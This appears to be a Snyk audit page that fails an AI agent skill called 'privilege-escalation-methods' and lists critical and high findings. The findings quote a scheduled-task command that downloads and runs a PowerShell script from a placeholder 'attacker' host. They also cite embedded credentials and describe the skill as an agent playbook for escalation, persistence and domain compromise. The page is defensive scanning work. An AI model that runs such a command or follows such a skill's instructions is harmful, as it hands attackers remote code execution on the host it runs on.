Skills
skills/sickn33/antigravity-awesome-skills/privilege-escalation-methods/Snyk

privilege-escalation-methods

Fail

Audited by Snyk on Feb 28, 2026

Risk Level: CRITICAL
Full Analysis

HIGH W007: Insecure credential handling detected in skill instructions.

  • Insecure credential handling detected (high risk: 1.00). The prompt includes commands and examples that embed credentials and secrets verbatim (e.g., user:password, -u/-p flags, /rc4:<NTLM_HASH>, Password123), so an agent following it would need to accept and output secret values directly.

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 1.00). The URL http://attacker/shell.ps1 is a direct link to a PowerShell script hosted on an untrusted/malicious-looking domain (high-risk for malware delivery), while https://facebook.com is a legitimate site but could be used as a benign lure; the presence of the .ps1 on "attacker" makes the set suspicious.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). This skill is explicitly a step-by-step malicious playbook for unauthorized privilege escalation, credential theft, persistence, and Active Directory/domain compromise, clearly intended to enable system compromise and backdoor access.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). The skill's SKILL.md explicitly instructs creating a scheduled task that runs "powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'" (Golden Ticket with Scheduled Tasks section), which directs the agent/workflow to fetch and execute arbitrary content from an external URL, satisfying ingestion of untrusted third‑party content that can change subsequent actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill includes an explicit runtime command that downloads and executes remote code via PowerShell (iex (iwr http://attacker/shell.ps1)), which fetches and runs a remote script during execution.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). This skill explicitly instructs the agent on techniques to gain root/Administrator, modify system files, set SUID bits, create persistent backdoors and user accounts, and perform other state-changing actions on target machines, thus encouraging compromise of the host it runs on.
Audit Metadata
Risk Level
CRITICAL
Analyzed
Feb 28, 2026, 08:31 AM